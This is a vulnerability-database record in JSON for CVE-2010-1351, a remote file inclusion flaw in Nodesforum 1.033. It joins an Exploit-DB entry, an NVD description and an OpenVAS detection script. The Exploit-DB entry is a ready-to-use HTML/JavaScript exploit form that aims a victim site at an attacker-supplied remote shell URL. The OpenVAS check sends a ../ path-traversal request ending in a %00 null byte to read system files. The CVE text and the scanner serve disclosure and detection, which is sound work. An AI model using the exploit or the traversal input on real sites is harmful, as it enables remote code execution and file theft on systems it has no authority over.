{"lastseen": "2016-02-01T15:35:13", "osvdbidlist": ["63555", "63554"], "references": [], "description": "nodesforum v1.033 Remote File Inclusion Vulnerability. CVE-2010-1351. Webapps exploit for php platform", "reporter": "ITSecTeam", "published": "2010-04-04T00:00:00", "type": "exploitdb", "title": "nodesforum 1.033 - Remote File Inclusion Vulnerability", "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-02-01T15:35:13", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-1351"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902040"]}], "modified": "2016-02-01T15:35:13", "rev": 2}, "vulnersScore": 7.2}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1351"], "modified": "2010-04-04T00:00:00", "id": "EDB-ID:12047", "href": "https://www.exploit-db.com/exploits/12047/", "viewCount": 5, "sourceData": "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1254\">\r\n<title>coded by ahmadbady</title>\r\n\r\n<script language=\"JavaScript\">\r\n\r\n//===========================================================================\r\n//( #Topic : nodesforum_1.033\r\n//( #Bug type : multi remote file include\r\n//( #Advisory : \r\n//===========================================================================\r\n//( #Author : ItSecTeam\r\n//( #Email : Bug@ITSecTeam.com\r\n//( #Website: http://www.itsecteam.com\r\n//( #Forum : http://forum.ITSecTeam.com\r\n//vuls---------------------------------------------------------------------\r\n//erase_user_data.php line 6;\r\n//pre_output.php line 16 ;\r\n//--------------------------------------------------------------------------\r\n\r\nvar variable1 =\"?_nodesforum_path_from_here_to_nodesforum_folder=\"\r\nvar variable2 =\"?_nodesforum_code_path=\"\r\n \r\n function it(){\r\n if (xpl.file.value==\"pre_output.php\"){\r\n variable1 = variable2;\r\n \r\n }\r\n xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+variable1+xpl.shell.value;xpl.submit(); \r\n }\r\n</script>\r\n\r\n</head>\r\n\r\n<body bgcolor=\"#FFFFFF\">\r\n\r\n<p align=\"left\"><font color=\"#FF0000\">vul1 file:/path/erase_user_data.php</font></p>\r\n<p align=\"left\"><font color=\"#FF0000\">vul2 file:/path/pre_output.php</font></p>\r\n<p align=\"left\"><font color=\"#0000FF\">-----------------------------------</font></p>\r\n<form method=\"post\" name=\"xpl\" onSubmit=\"it();\">\r\n <p align=\"left\">\r\n <font \r\nsize=\"2\" face=\"Tahoma\">\r\n \tvictim:\r\n \t<input type=\"text\" name=\"victim\" size=\"20\";\" style=\"color: #FFFFFF; background-color: #000000\"> \r\n\tpath:\r\n\t<input type=\"text\" name=\"path\" size=\"20\";\" style=\"color: #FFFFFF; background-color: #000000\"> \r\n\tfile:\r\n\t<input type=\"text\" name=\"file\" size=\"20\";\" style=\"color: #FFFFFF; background-color: #000000\"> \r\n\tshell address:\r\n\t<input type=\"text\" name=\"shell\" size=\"20\";\" style=\"color: #FFFFFF; background-color: #000000\"></p>\r\n \t</p>\r\n<center>\r\n\r\n</p>\r\n <p><input type=\"submit\" value=\"GO\" name=\"B1\" style=\"float: left\"><input type=\"reset\" \r\nvalue=\"reset\" name=\"B2\" style=\"float: left\"></p>\r\n</form>\r\n<p><br>\r\n\u00c2\u00a0</p>\r\n</center>\r\n</body>\r\n\r\n</html>", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/12047/"}

{"cve": [{"lastseen": "2020-09-21T13:55:43", "description": "Multiple PHP remote file inclusion vulnerabilities in Nodesforum 1.033 and 1.045, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) _nodesforum_path_from_here_to_nodesforum_folder parameter to erase_user_data.php and the (2) _nodesforum_code_path parameter to pre_output.php. NOTE: some of these details are obtained from third party information.", "edition": 2, "cvss3": {}, "published": "2010-04-12T18:30:00", "title": "CVE-2010-1351", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1351"], "modified": "2017-08-17T01:32:00", "cpe": ["cpe:/a:nodesforum:nodesforum:1.033", "cpe:/a:nodesforum:nodesforum:1.045"], "id": "CVE-2010-1351", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1351", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:nodesforum:nodesforum:1.045:*:*:*:*:*:*:*", "cpe:2.3:a:nodesforum:nodesforum:1.033:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-08T19:11:48", "description": "This host is running Nodesforum and is prone to multiple remote file\n inclusion vulnerabilities.", "edition": 9, "published": "2010-04-16T00:00:00", "title": "Nodesforum Multiple Remote File Inclusion Vulnerabilities", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1351"], "modified": "2020-05-06T00:00:00", "id": "OPENVAS:1361412562310902040", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902040", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Nodesforum Multiple Remote File Inclusion Vulnerabilities\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902040\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-04-16 16:17:26 +0200 (Fri, 16 Apr 2010)\");\n script_cve_id(\"CVE-2010-1351\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Nodesforum Multiple Remote File Inclusion Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/39311\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/57517\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/12047\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to execute arbitrary\n code in a user's browser session in the context of an affected site.\");\n\n script_tag(name:\"affected\", value:\"Nodesforum version 1.045 and prior.\");\n\n script_tag(name:\"insight\", value:\"Input passed to '_nodesforum_path_from_here_to_nodesforum_folder'\n parameter in 'erase_user_data.php' and to the '_nodesforum_code_path' parameter\n in 'pre_output.php' is not being validated before being used to include files.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"This host is running Nodesforum and is prone to multiple remote file\n inclusion vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_php( port:port ) ) exit( 0 );\n\nfiles = traversal_files();\n\nforeach dir( make_list_unique( \"/nodesforum\", \"/Nodesforum\", \"/\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/index.php\";\n\n res = http_get_cache( item:url, port:port );\n\n if( res =~ \"^HTTP/1\\.[01] 200\" && \"Nodesforum\" >< res ) {\n\n foreach file( keys( files ) ) {\n\n url = string(dir, \"/erase_user_data.php?_nodesforum_path_from_here_to_nodesforum_folder=../../../../../../../../\", files[file], \"%00\");\n\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}